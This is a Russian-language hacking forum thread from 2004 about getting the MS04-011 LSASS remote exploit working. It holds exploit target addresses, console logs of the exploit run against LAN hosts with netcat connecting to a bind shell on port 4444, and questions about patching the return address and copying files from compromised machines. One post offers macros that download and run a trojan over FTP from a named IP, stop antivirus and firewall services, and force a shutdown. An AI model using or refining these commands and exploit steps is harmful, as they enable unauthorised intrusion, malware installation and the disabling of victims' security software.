Цитата |
---|
Olegnet пишет: В этот раз, компилить его нужно в VC++, а не в lcc. |
правда есть пару ошибок...
легкоисправляемых...
07.07.2004 13:43:58
правда есть пару ошибок... легкоисправляемых... |
|||
|
|
07.07.2004 22:19:24
народ объясните, коннектчюсь к поломатой тачке через putty,
говорит conection refused. |
|
|
|
08.07.2004 00:22:14
Предлагаю макросы для
1. Выводит имена пользователей Задержка 100мс Текст: cd\ cd docume~1 dir 2. Загружаем троянец Задержка 100мс Текст: ftp open 217.107.17.153 asdf get \exp.exe !exp.exe bye 3. Убивает файерволы, антивирусы и проч. Задержка 500мс Текст: net stop Mcshield net stop "Norton Antivirus Service" net stop "Panda Antivirus" net stop "ZoneAlarm" net stop "McAfee Framework Service" net stop "SpIDer Guard for Windows NT" 4. Для приколистов Красивое вырубание компа Задержка 5мс Текст: shutdown -s -t 60 -c "Здравствуй, моё солнышко! Ты просто не представляешь, как сильно я тебя люблю! Если ты узнаешь, от когоэто послание, моей радости не будет предела! Я ЛЮБЛЮ ТЕБЯ!!!" -f Дерзайте! Придумаете макрос - постите на форум! |
|
|
|
09.07.2004 19:52:07
Неверный target. |
|||
|
|
09.07.2004 22:08:04
Pro написал:Неверный target.
<font color=RED>Target верный: Targets: 0 [0x01004600>: WinXP Professional [universal> lsass.exe 1 [0x7515123c>: Win2k Professional [universal> netrap.dll 2 [0x751c123c>: Win2k Advanced Server [SP4> netrap .dll У всех машин версия ОС точно известна (они все в моём центре стоят, много разных 2K,XP,Eng,Rus, разные SP) А поведение различное (иногда shell, чаще DOS) и для каждой конкретной машины отличается стабильностью (если shell, то всегда shell а не DOS) Значит есть закономерность какая-то, нас 9 человек над этим думали, разобраться не можем, а интересно. Вообщем если кто знает и может напишите в форум или на mail </font> |
|
|
|
09.07.2004 22:55:21
To Pro:
Спасибо за участие, но такой вариант у нас был, дело в том, что на части машин XP SP0, XP SP1 и Eng и Rus также вызывается DOS ! |
|
|
|
09.07.2004 23:52:36
2Protoss:
Эксплоит компилировал сам или скачивал экзешник? Попробуй против WinXP |
|
|
|
15.07.2004 01:38:05
В lcc все отлично компилиться, под Xp 2600 SP у меня все пошло
|
|
|
|
15.07.2004 17:54:12
Люди,объясните ну я вот поимел shell и что??
Можно как нибудь с удаленного компа копировать себе на комп, если ДА, то как???? ОБЬЯСНИТЕ!!!! плисс...а то я новичок в этом деле... |
|
|
|
03.08.2004 10:03:39
Создай ТХТ файл запиши в него код, потом название переминую, что на конце было .с
И запусти! Там сверху увидишь куда нажимать! |
|
|
|
10.08.2004 01:25:04
дайте plz отработанную версию lsasrv-expl.c хочеться под linux скомпилить, (кто-то давал
|
|
|
|
13.08.2004 23:39:08
ссылочку на дадите на описание RPC и как его кодить, а то уже пару дней по инету ищу, не могу найти инфу. Желательно на русском и с примерами.
|
|
|
|
31.08.2004 09:53:59
Мля , я короче прогу sasrv-expl.ехе в FAR открываю она говорит типа неправильная команда или имя файла !
Чё такое ??? [IMG] |
|
|
|
02.09.2004 01:40:05
Народ расскажте одну фишку. Юзаю я сплойт под 2к Соотвественно на удаленных 2к машинах шелл получаю без проблем. А вот если удаленная - ХП то сплойт только досит. Тут товарищь Sickle рассказал что надо сменить call esp на jmp. Расскажите поподробней. Нужно дизассемблить свой lsass.exe я так понимаю? Или lsasrv.dll? Врод кода мнемоники колла ни там ни там нету. Очень было бы неплохо если бы сказали сразу адресс и какое значение сменить на 744fa92d. Или может я чего-то непросек, намекните хоть а?
|
|
|
|
12.09.2004 12:04:19
why ?
D:\www>hod -t 192.168.1.38 445 MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1 --- Coded by .::[ houseofdabus ]::. --- [*] Target: IP: 192.168.1.38: OS: WinXP Professional [universal] lsass.exe [*] Connecting to 192.168.1.38:445 ... [-] Sorry, cannot connect to 192.168.1.38:445. Try again... D:\www>hod -t 192.168.1.50 445 MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1 --- Coded by .::[ houseofdabus ]::. --- [*] Target: IP: 192.168.1.50: OS: WinXP Professional [universal] lsass.exe [*] Connecting to 192.168.1.50:445 ... OK [*] Attacking ... OK D:\www>nc 192.168.1.50 4444 D:\www>nc 192.168.1.50 445 ^C D:\www>hod -1 192.168.1.50 4444 MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1 --- Coded by .::[ houseofdabus ]::. --- [*] Target: IP: 192.168.1.50: OS: [*] Connecting to 192.168.1.50:445 ... OK [*] Attacking ... OK D:\www>nc 192.168.1.50 4444 |
|
|
|
12.09.2004 12:29:36
why can this does not it act ? be to possibly reason different version windowsa 2000 here ?
up to here mum only accessible expl for : 0 [0x01004600]: WinXP Professional [universal] lsass.exe 1 [0x7515123c]: Win2k Professional [universal] netrap.dll 2 [0x751c123c]: Win2k Advanced Server [SP4] netrap.dll for EN and RU and for PL ? be this to possibly reason ? I greet |
||||
|
|
|||